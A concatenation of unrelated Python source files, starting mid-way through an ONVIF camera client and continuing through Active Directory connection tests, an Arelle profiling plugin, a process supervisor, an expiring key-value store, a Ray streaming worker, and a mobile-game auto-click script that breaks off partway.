def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['ws_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(zeepobject):
# Convert a WSDL Type instance into a dictionary
return {} if zeepobject is None else zeep.helpers.serialize_object(zeepobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
else:
params = ONVIFService.to_dict(params)
try:
ret = func(**params)
except TypeError:
ret = func(params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
def __getattr__(self, name):
"""
Call the real onvif Service operations,
See the official wsdl definition for the
APIs detail(API name, request parameters,
response parameters, parameter types, etc...)
"""
builtin = name.startswith('__') and name.endswith('__')
if builtin:
return self.__dict__[name]
else:
return self.service_wrapper(getattr(self.ws_client, name))
class ONVIFCamera(object):
"""
Python Implementation of an ONVIF compliant device.
This class integrates ONVIF services
adjust_time parameter allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environments.
Also, this cannot be used on AXIS camera, as every request is authenticated, contrary to ONVIF standard
>>> from onvif import ONVIFCamera
>>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
>>> mycam.devicemgmt.GetServices(False)
>>> media_service = mycam.create_media_service()
>>> ptz_service = mycam.create_ptz_service()
# Get PTZ Configuration:
>>> ptz_service.GetConfiguration()
"""
# Class-level variables
services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
'imaging': None, 'events': None, 'analytics': None}
use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
'imaging': True, 'events': True, 'analytics': True}
def __init__(self, host, port, user, passwd,
wsdl_dir=os.path.join(os.path.dirname(os.path.dirname(__file__)),
"wsdl"),
encrypt=True, daemon=False, no_cache=False, adjust_time=False,
transport=None):
os.environ.pop('http_proxy', None)
os.environ.pop('https_proxy', None)
self.host = host
self.port = int(port)
self.user = user
self.passwd = passwd
self.wsdl_dir = wsdl_dir
self.encrypt = encrypt
self.daemon = daemon
self.no_cache = no_cache
self.adjust_time = adjust_time
self.transport = transport
# Active service client container
self.services = {}
self.services_lock = RLock()
# Set xaddrs
self.update_xaddrs()
self.to_dict = ONVIFService.to_dict
def update_xaddrs(self):
# Establish devicemgmt service first
self.dt_diff = None
self.devicemgmt = self.create_devicemgmt_service()
if self.adjust_time:
cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day,
cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
self.dt_diff = cam_date - dt.datetime.utcnow()
self.devicemgmt.dt_diff = self.dt_diff
self.devicemgmt = self.create_devicemgmt_service()
# Get XAddr of services on the device
self.xaddrs = {}
capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
for name in capabilities:
capability = capabilities[name]
try:
if name.lower() in SERVICES and capability is not None:
ns = SERVICES[name.lower()]['ns']
self.xaddrs[ns] = capability['XAddr']
except Exception:
logger.exception('Unexpected service type')
with self.services_lock:
try:
self.event = self.create_events_service()
self.xaddrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = \
self.event.CreatePullPointSubscription().SubscriptionReference.Address._value_1
except Exception:
pass
def update_url(self, host=None, port=None):
changed = False
if host and self.host != host:
changed = True
self.host = host
if port and self.port != port:
changed = True
self.port = port
if not changed:
return
self.devicemgmt = self.create_devicemgmt_service()
self.capabilities = self.devicemgmt.GetCapabilities()
with self.services_lock:
for sname in self.services.keys():
xaddr = getattr(self.capabilities, sname.capitalize).XAddr
self.services[sname].ws_client.set_options(location=xaddr)
def get_service(self, name, create=True):
service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name, portType=None):
"""Returns xaddr and wsdl of specified service"""
# Check if the service is supported
if name not in SERVICES:
raise ONVIFError('Unknown service %s' % name)
wsdl_file = SERVICES[name]['wsdl']
ns = SERVICES[name]['ns']
binding_name = '{%s}%s' % (ns, SERVICES[name]['binding'])
if portType:
ns += '/' + portType
wsdlpath = os.path.join(self.wsdl_dir, wsdl_file)
if not os.path.isfile(wsdlpath):
raise ONVIFError('No such file: %s' % wsdlpath)
# XAddr for devicemgmt is fixed:
if name == 'devicemgmt':
xaddr = '%s:%s/onvif/device_service' % \
(self.host if (self.host.startswith('http://') or self.host.startswith('https://'))
else 'http://%s' % self.host, self.port)
return xaddr, wsdlpath, binding_name
# Get other XAddr
xaddr = self.xaddrs.get(ns)
if not xaddr:
raise ONVIFError("Device doesn't support service: %s" % name)
return xaddr, wsdlpath, binding_name
def create_onvif_service(self, name, portType=None, transport=None):
"""
Create ONVIF service client.
:param name: service name, should be present as a key within
the `SERVICES` dictionary declared within the `onvif.definition` module
:param portType:
:param transport:
:return:
"""
"""Create ONVIF service client"""
name = name.lower()
xaddr, wsdl_file, binding_name = self.get_definition(name, portType)
with self.services_lock:
if not transport:
transport = self.transport
service = ONVIFService(xaddr, self.user, self.passwd,
wsdl_file, self.encrypt,
self.daemon, no_cache=self.no_cache,
dt_diff=self.dt_diff,
binding_name=binding_name,
transport=transport)
self.services[name] = service
setattr(self, name, service)
if not self.services_template.get(name):
self.services_template[name] = service
return service
def create_devicemgmt_service(self, transport=None):
# The entry point for devicemgmt service is fixed.
return self.create_onvif_service('devicemgmt', transport=transport)
def create_media_service(self, transport=None):
return self.create_onvif_service('media', transport=transport)
def create_ptz_service(self, transport=None):
return self.create_onvif_service('ptz', transport=transport)
def create_imaging_service(self, transport=None):
return self.create_onvif_service('imaging', transport=transport)
def create_deviceio_service(self, transport=None):
return self.create_onvif_service('deviceio', transport=transport)
def create_events_service(self, transport=None):
return self.create_onvif_service('events', transport=transport)
def create_analytics_service(self, transport=None):
return self.create_onvif_service('analytics', transport=transport)
def create_recording_service(self, transport=None):
return self.create_onvif_service('recording', transport=transport)
def create_search_service(self, transport=None):
return self.create_onvif_service('search', transport=transport)
def create_replay_service(self, transport=None):
return self.create_onvif_service('replay', transport=transport)
def create_pullpoint_service(self, transport=None):
return self.create_onvif_service('pullpoint',
portType='PullPointSubscription',
transport=transport)
def create_receiver_service(self, transport=None):
return self.create_onvif_service('receiver', transport=transport)
def create_notification_service(self, transport=None):
return self.create_onvif_service('notification', transport=transport)
def create_subscription_service(self, transport=None):
return self.create_onvif_service('subscription', transport=transport)
|
connection_test.py
|
import demistomock as demisto
from Active_Directory_Query import main
import socket
import ssl
from threading import Thread
import time
BASE_TEST_PARAMS = {
'server_ip': '127.0.0.1',
'secure_connection': 'None',
'page_size': '500',
'credentials': {'identifier': 'bad', 'password': 'bad'}
}
RETURN_ERROR_TARGET = 'Active_Directory_Query.return_error'
def test_bad_host_no_ssl(mocker):
mocker.patch.object(demisto, 'params',
return_value=BASE_TEST_PARAMS)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('server_ip') == '127.0.0.1'
main()
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
def test_bad_ssl(mocker):
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '185.199.108.153' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['port'] = 443
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
assert 'SSL error' in err_msg
def ssl_bad_socket_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# cert and keyfile generated with
# openssl req -x509 -nodes -days 3000 -newkey rsa:2048 -keyout key.pem -out cert.pem
context.load_cert_chain('cert.pem', 'key.pem')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
sock.bind(('127.0.0.1', 9636))
sock.listen(5)
with context.wrap_socket(sock, server_side=True) as ssock:
conn, addr = ssock.accept()
print("received connection from: {}".format(addr))
conn.recv(32)
msg = b'THIS IS A TEST SERVER WHICH IGNORES PROTOCOL\n\n'
for x in range(10):
msg += msg
conn.send(msg)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
def test_faulty_server(mocker):
t = Thread(target=ssl_bad_socket_server)
t.start()
time.sleep(1) # wait for socket server to startup
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '127.0.0.1' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['unsecure'] = True
params['port'] = 9636
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
t.join(5)
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
|
formulaProfiler.py
|
'''
Save DTS is an example of a plug-in to GUI menu that will profile formula execution.
(c) Copyright 2012 Mark V Systems Limited, All rights reserved.
'''
import os
from tkinter import simpledialog, messagebox
def profileFormulaMenuEntender(cntlr, menu):
# Extend menu with an item for the profile formula plugin
menu.add_command(label="Profile formula validation",
underline=0,
command=lambda: profileFormulaMenuCommand(cntlr) )
def profileFormulaMenuCommand(cntlr):
# save DTS menu item has been invoked
if cntlr.modelManager is None or cntlr.modelManager.modelXbrl is None:
cntlr.addToLog("No taxonomy loaded.")
return
# get file name into which to save log file while in foreground thread
profileReportFile = cntlr.uiFileDialog("save",
title=_("arelle - Save Formula Profile Report"),
initialdir=cntlr.config.setdefault("formulaProfileReportDir","."),
filetypes=[(_("Profile report file .log"), "*.log")],
defaultextension=".log")
if not profileReportFile:
return False
errMsg = ""
maxRunTime = 0
while (1):
timeout = simpledialog.askstring(_("arelle - Set formula run time limit"),
_("{0}You may enter the maximum number of minutes to run formulas.\n"
"(Leave empty for no run time limitation.)".format(errMsg)),
parent=cntlr.parent)
if timeout:
try:
maxRunTime = float(timeout)
break
except ValueError as err:
errMsg = str(err) + "\n\n"
excludeCompileTime = messagebox.askyesno(_("arelle - Exclude formula compile statistics"),
_("Should formula compiling be excluded from the statistics?\n"
"(Yes will make a separate compiling \"pass\" so that statistics include execution only.)".format(errMsg)),
parent=cntlr.parent)
cntlr.config["formulaProfileReportDir"] = os.path.dirname(profileReportFile)
cntlr.saveConfig()
# perform validation and profiling on background thread
import threading
thread = threading.Thread(target=lambda c=cntlr, f=profileReportFile, t=maxRunTime, e=excludeCompileTime: backgroundProfileFormula(c,f,t,e))
thread.daemon = True
thread.start()
def backgroundProfileFormula(cntlr, profileReportFile, maxRunTime, excludeCompileTime):
from arelle import Locale, XPathParser, ValidateXbrlDimensions, ValidateFormula
# build grammar before profiling (if this is the first pass, so it doesn't count in profile statistics)
XPathParser.initializeParser(cntlr.modelManager)
# load dimension defaults
ValidateXbrlDimensions.loadDimensionDefaults(cntlr.modelManager)
import cProfile, pstats, sys, time
# a minimal validation class for formula validator parameters that are needed
class Validate:
def __init__(self, modelXbrl, maxRunTime):
self.modelXbrl = modelXbrl
self.parameters = None
self.validateSBRNL = False
self.maxFormulaRunTime = maxRunTime
def close(self):
self.__dict__.clear()
val = Validate(cntlr.modelManager.modelXbrl, maxRunTime)
formulaOptions = val.modelXbrl.modelManager.formulaOptions
if excludeCompileTime:
startedAt = time.time()
cntlr.addToLog(_("pre-compiling formulas before profiling"))
val.validateFormulaCompileOnly = True
ValidateFormula.validate(val)
del val.validateFormulaCompileOnly
cntlr.addToLog(Locale.format_string(cntlr.modelManager.locale,
_("formula pre-compiling completed in %.2f secs"),
time.time() - startedAt))
cntlr.addToLog(_("executing formulas for profiling"))
else:
cntlr.addToLog(_("compiling and executing formulas for profiling"))
startedAt = time.time()
statsFile = profileReportFile + ".bin"
cProfile.runctx("ValidateFormula.validate(val)", globals(), locals(), statsFile)
cntlr.addToLog(Locale.format_string(cntlr.modelManager.locale,
_("formula profiling completed in %.2f secs"),
time.time() - startedAt))
# dereference val
val.close()
# specify a file for log
priorStdOut = sys.stdout
sys.stdout = open(profileReportFile, "w")
statObj = pstats.Stats(statsFile)
statObj.strip_dirs()
statObj.sort_stats("time")
statObj.print_stats()
statObj.print_callees()
statObj.print_callers()
sys.stdout.flush()
sys.stdout.close()
del statObj
sys.stdout = priorStdOut
os.remove(statsFile)
__pluginInfo__ = {
'name': 'Profile Formula Validation',
'version': '1.0',
'description': "This plug-in adds a profiled formula validation. "
"Includes XPath compilation in the profile if it is the first validation of instance; "
"to exclude XPath compile statistics, validate first the normal way (e.g., toolbar button) "
"and then validate again using this profile formula validation plug-in. ",
'license': 'Apache-2',
'author': 'Mark V Systems Limited',
'copyright': '(c) Copyright 2012 Mark V Systems Limited, All rights reserved.',
# classes of mount points (required)
'CntlrWinMain.Menu.Validation': profileFormulaMenuEntender,
}
|
supervisor.py
|
import multiprocessing
import os
import signal
import time
import sys
import setproctitle
import psutil
from dagger.logger import logger
HANDLED_SIGNALS = (
signal.SIGINT,
signal.SIGTERM,
)
__all__ = ("Supervisor",)
class Supervisor:
def __init__(self, target, args=(), kwargs=None, name=None, worker_memory_limit=0):
self.target = target
self.args = args
self.kwargs = kwargs if kwargs is not None else {}
self.name = name
self.should_exit = False
self.worker_memory_limit = worker_memory_limit
def handle_exit(self, sig, frame):
self.should_exit = True
def _run(self, *args, **kwargs):
self._set_process_name(False)
try:
self.target(*args, **kwargs)
except Exception as exc:
logger.exception("worker [%d] got uncaught error %r", os.getpid(), exc)
sys.exit(1)
def start(self, workers=1):
logger.info("Started master process [%d]", os.getpid())
self._set_process_name(True)
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
processes = []
args = self.args
kwargs = self.kwargs
try:
for idx in range(workers):
process = multiprocessing.Process(target=self._run, args=args, kwargs=kwargs)
process.start()
processes.append(process)
max_memory_allowed = self.worker_memory_limit
while not self.should_exit:
if not processes:
break
for i in range(len(processes)):
process = processes[i]
if not process.is_alive():
process.join()
del processes[i]
break
if not max_memory_allowed:
continue
pid = process.pid
process = psutil.Process(pid)
mem = process.memory_info()
if mem.rss > max_memory_allowed: # bytes
os.kill(pid, signal.SIGINT)
logger.warning("%s worker killed because memory overflowed", process)
process = multiprocessing.Process(target=self._run, args=args, kwargs=kwargs)
process.start()
processes.append(process)
time.sleep(0.1)
finally:
logger.info("Stopping master process [%d]", os.getpid())
for process in processes:
process.terminate()
for process in processes:
process.join()
logger.info("Exit master process [%d]", os.getpid())
def _set_process_name(self, master: bool = False) -> bool:
name = self.name
if not name:
return False
if callable(name):
name = name()
suffix = "[master]" if master else "[worker]"
name += suffix
setproctitle.setproctitle(name)
return True
|
kv_storage.py
|
#!/bin/python3
import time
import threading
import random
def check(pool, times=20, maxCount=5):
while len(pool.expire) >= times:
count = 0
for k in random.sample(list(pool.expire), times):
if not pool.get(k):
count += 1
if count < maxCount:
break
def expireTest(pool, cycle):
try:
while pool:
check(pool)
time.sleep(cycle)
except NameError:
pass
finally:
del pool
class Pool:
def __init__(self, *, checkCycle=10):
self.alive = True
self.__pool = {}
self.expire = {}
t = threading.Thread(target=lambda: expireTest(self, checkCycle))
t.daemon = True
t.start()
def get(self, key):
if self.expire.get(key) and self.expire[key] <= int(time.time()):
self.delete(key)
return None
return self.__pool.get(key)
def set(self, key, value, *, expire: int = None):
self.__pool[key] = value
if expire:
self.expire[key] = int(time.time()) + expire
elif self.expire.get(key):
self.expire.pop(key)
def delete(self, key):
if self.expire.get(key):
self.expire.pop(key)
if self.__pool.get(key):
return bool(self.__pool.pop(key))
|
jobworker.py
|
import logging
import pickle
import threading
import ray
import ray.streaming._streaming as _streaming
from ray.streaming.config import Config
from ray.function_manager import FunctionDescriptor
from ray.streaming.communication import DataInput, DataOutput
logger = logging.getLogger(__name__)
@ray.remote
class JobWorker:
"""A streaming job worker.
Attributes:
worker_id: The id of the instance.
input_channels: The input gate that manages input channels of
the instance (see: DataInput in communication.py).
output_channels (DataOutput): The output gate that manages output
channels of the instance (see: DataOutput in communication.py).
the operator instance.
"""
def __init__(self, worker_id, operator, input_channels, output_channels):
self.env = None
self.worker_id = worker_id
self.operator = operator
processor_name = operator.processor_class.__name__
processor_instance = operator.processor_class(operator)
self.processor_name = processor_name
self.processor_instance = processor_instance
self.input_channels = input_channels
self.output_channels = output_channels
self.input_gate = None
self.output_gate = None
self.reader_client = None
self.writer_client = None
def init(self, env):
"""init streaming actor"""
env = pickle.loads(env)
self.env = env
logger.info("init operator instance %s", self.processor_name)
if env.config.channel_type == Config.NATIVE_CHANNEL:
core_worker = ray.worker.global_worker.core_worker
reader_async_func = FunctionDescriptor(
__name__, self.on_reader_message.__name__,
self.__class__.__name__)
reader_sync_func = FunctionDescriptor(
__name__, self.on_reader_message_sync.__name__,
self.__class__.__name__)
self.reader_client = _streaming.ReaderClient(
core_worker, reader_async_func, reader_sync_func)
writer_async_func = FunctionDescriptor(
__name__, self.on_writer_message.__name__,
self.__class__.__name__)
writer_sync_func = FunctionDescriptor(
__name__, self.on_writer_message_sync.__name__,
self.__class__.__name__)
self.writer_client = _streaming.WriterClient(
core_worker, writer_async_func, writer_sync_func)
if len(self.input_channels) > 0:
self.input_gate = DataInput(env, self.input_channels)
self.input_gate.init()
if len(self.output_channels) > 0:
self.output_gate = DataOutput(
env, self.output_channels,
self.operator.partitioning_strategies)
self.output_gate.init()
logger.info("init operator instance %s succeed", self.processor_name)
return True
# Starts the actor
def start(self):
self.t = threading.Thread(target=self.run, daemon=True)
self.t.start()
actor_id = ray.worker.global_worker.actor_id
logger.info("%s %s started, actor id %s", self.__class__.__name__,
self.processor_name, actor_id)
def run(self):
logger.info("%s start running", self.processor_name)
self.processor_instance.run(self.input_gate, self.output_gate)
logger.info("%s finished running", self.processor_name)
self.close()
def close(self):
if self.input_gate:
self.input_gate.close()
if self.output_gate:
self.output_gate.close()
def is_finished(self):
return not self.t.is_alive()
def on_reader_message(self, buffer: bytes):
"""used in direct call mode"""
self.reader_client.on_reader_message(buffer)
def on_reader_message_sync(self, buffer: bytes):
"""used in direct call mode"""
if self.reader_client is None:
return b" " * 4 # special flag to indicate this actor not ready
result = self.reader_client.on_reader_message_sync(buffer)
return result.to_pybytes()
def on_writer_message(self, buffer: bytes):
"""used in direct call mode"""
self.writer_client.on_writer_message(buffer)
def on_writer_message_sync(self, buffer: bytes):
"""used in direct call mode"""
if self.writer_client is None:
return b" " * 4 # special flag to indicate this actor not ready
result = self.writer_client.on_writer_message_sync(buffer)
return result.to_pybytes()
|
gui.py
|
# -*- coding:utf-8 -*-
# 用户:HYL
# 日期:2021年11月17日
import time
from tkinter import Tk, Button
import threading
import uiautomator2 as u2
print('欢迎使用烟雨江湖脚本,本脚本禁止商用。')
print("初始位置在泰山马车处,需要有马车票,使用前请先检查是否有马车票")
class MainWindow(Tk):
"""继承Tk,实例化窗口"""
def __init__(self):
super().__init__()
self.title('烟雨江湖脚本')
self.geometry('300x300+20+20')
print('初始化脚本界面')
self.main_event()
print('连接模拟器')
self.device = u2.connect('127.0.0.1:5555')
print('连接成功')
print('-------------------------------------------------------------------')
def main_event(self):
"""事件主体"""
btn1 = Button(self, text='塞北刷怪', command=lambda: MainWindow.thread_it(self.sai_bei))
btn1.place(x=20, y=100)
btn2 = Button(self, text='燕王阁3次', command=lambda: MainWindow.thread_it(self.yan_wang))
btn2.place(x=100, y=100)
btn3 = Button(self, text='枯骨门1次', command=lambda: MainWindow.thread_it(self.ku_gu))
btn3.place(x=180, y=100)
btn4 = Button(self, text='天一教1次', command=lambda: MainWindow.thread_it(self.tian_yi))
btn4.place(x=20, y=200)
btn5 = Button(self, text='铁刃门1次', command=lambda: MainWindow.thread_it(self.tie_ren))
btn5.place(x=100, y=200)
btn5 = Button(self, text='一键运行所有', command=lambda: MainWindow.thread_it(self.yi_jian))
btn5.place(x=180, y=200)
def sai_bei(self):
"""塞北刷怪"""
print('泰山到塞北')
self.device.click(0.214, 0.95)
time.sleep(2)
self.device.click(0.312, 0.819)
time.sleep(2)
self.device.click(0.362, 0.12)
time.sleep(5)
self.device.click(0.224, 0.372)
time.sleep(5)
self.device.click(0.096, 0.585)
time.sleep(6)
self.device.click(0.43, 0.471)
time.sleep(6)
self.device.click(0.268, 0.634)
time.sleep(6)
self.device.click(0.432, 0.468)
time.sleep(6)
self.device.click(0.108, 0.769)
time.sleep(6)
self.device.click(0.21, 0.393)
time.sleep(6)
print('开始刷怪')
for i in range(10):
self.device.click(0.378, 0.436)
time.sleep(5)
self.device.click(0.548, 0.691)
time.sleep(5)
self.device.click(0.712, 0.347)
time.sleep(5)
self.device.click(0.38, 0.741)
time.sleep(5)
self.device.click(0.662, 0.489)
time.sleep(5)
self.device.click(0.09, 0.691)
time.sleep(5)
self.device.click(0.258, 0.209)
time.sleep(5)
print('回到泰山')
self.device.click(0.258, 0.209)
time.sleep(5)
self.device.click(0.198, 0.957)
time.sleep(3)
self.device.click(0.274, 0.804)
time.sleep(3)
self.device.click(0.742, 0.609)
time.sleep(3)
self.device.click(0.592, 0.861)
time.sleep(10)
print('刷野完成')
def yan_wang(self):
print("""泰山到幽州""")
self.device.click(0.204, 0.946)
time.sleep(2)
self.device.click(0.296, 0.822)
time.sleep(2)
self.device.click(0.58, 0.294)
time.sleep(2)
self.device.click(0.432, 0.549)
time.sleep(8)
print("""走到副本前面""")
self.device.click(0.672, 0.797)
time.sleep(5)
self.device.click(0.212, 0.776)
time.sleep(5)
self.device.click(0.658, 0.691)
time.sleep(5)
self.device.click(0.688, 0.691)
time.sleep(5)
self.device.click(0.734, 0.748)
time.sleep(5)
self.device.click(0.736, 0.755)
time.sleep(5)
self.device.click(0.552, 0.595)
time.sleep(5)
print("""第一次与士兵对话""")
self.device.click(0.924, 0.539)
time.sleep(5)
self.device.click(0.6, 0.436)
time.sleep(5)
self.device.click(0.596, 0.421)
time.sleep(5)
self.device.click(0.646, 0.439)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
# -------------------------------------
print("""第二次与士兵对话""")
self.device.click(0.544, 0.588) # 走过去
time.sleep(5)
self.device.click(0.918, 0.542)
time.sleep(5)
self.device.click(0.61, 0.432)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
# --------------------------------------
print("""第三次与士兵对话""")
self.device.click(0.544, 0.588) # 走过去
time.sleep(5)
self.device.click(0.918, 0.542)
time.sleep(5)
self.device.click(0.61, 0.432)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.592, 0.613)
time.sleep(2)
self.device.click(0.456, 0.861)
time.sleep(6)
print('----------------------燕王阁完成-------------------')
def ku_gu(self):
print("""从泰山到杭州""")
self.device.click(0.208, 0.943)
time.sleep(2)
self.device.click(0.302, 0.804)
time.sleep(2)
self.device.click(0.616, 0.698)
time.sleep(2)
self.device.click(0.478, 0.936)
time.sleep(8)
print("""走到副本""")
self.device.click(0.044, 0.734)
time.sleep(5)
self.device.click(0.216, 0.294)
time.sleep(5)
self.device.click(0.26, 0.326)
time.sleep(5)
self.device.click(0.444, 0.18)
time.sleep(5)
self.device.click(0.928, 0.546)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(12)
print("""进入副本开刷""")
self.device.click(0.808, 0.581)
time.sleep(5)
self.device.click(0.548, 0.18)
time.sleep(5)
self.device.click(0.214, 0.088)
time.sleep(5)
self.device.click(0.772, 0.776)
time.sleep(5)
self.device.click(0.665, 0.588)
time.sleep(5)
self.device.click(0.688, 0.287)
time.sleep(5)
self.device.click(0.712, 0.514)
time.sleep(5)
self.device.click(0.49, 0.262)
time.sleep(5)
self.device.click(0.748, 0.216)
time.sleep(5)
self.device.click(0.654, 0.588)
time.sleep(5)
self.device.click(0.596, 0.138)
time.sleep(5)
self.device.click(0.768, 0.287)
time.sleep(5)
self.device.click(0.494, 0.407)
time.sleep(8)
self.device.click(0.662, 0.258)
time.sleep(5)
self.device.click(0.152, 0.549)
time.sleep(5)
self.device.click(0.608, 0.432)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.594, 0.294)
time.sleep(2)
self.device.click(0.456, 0.549)
time.sleep(6)
print('----------------------枯骨门完成-------------------')
def tian_yi(self):
print("""从泰山到成都""")
self.device.click(0.21, 0.96)
time.sleep(2)
self.device.click(0.296, 0.815)
time.sleep(2)
self.device.click(0.154, 0.907)
time.sleep(2)
self.device.click(0.016, 0.939)
time.sleep(8)
print("""走到副本""")
self.device.click(0.436, 0.797)
time.sleep(5)
self.device.click(0.598, 0.734)
time.sleep(5)
self.device.click(0.92, 0.535)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(8)
print("""进入副本刷怪""")
self.device.click(0.754, 0.79)
time.sleep(5)
self.device.click(0.662, 0.585)
time.sleep(5)
self.device.click(0.758, 0.776)
time.sleep(5)
self.device.click(0.716, 0.539)
time.sleep(5)
self.device.click(0.432, 0.287)
time.sleep(5)
self.device.click(0.588, 0.23)
time.sleep(5)
self.device.click(0.268, 0.241)
time.sleep(5)
self.device.click(0.208, 0.109)
time.sleep(5)
self.device.click(0.766, 0.202)
time.sleep(5)
self.device.click(0.438, 0.599)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.938, 0.251)
time.sleep(2)
self.device.click(0.794, 0.521)
time.sleep(6)
print('----------------------天一教完成-------------------')
def tie_ren(self):
print("""泰山到杭州""")
self.device.click(0.202, 0.946)
time.sleep(2)
self.device.click(0.304, 0.819)
time.sleep(2)
self.device.click(0.614, 0.698)
time.sleep(2)
self.device.click(0.476, 0.946)
time.sleep(8)
print("""走到副本""")
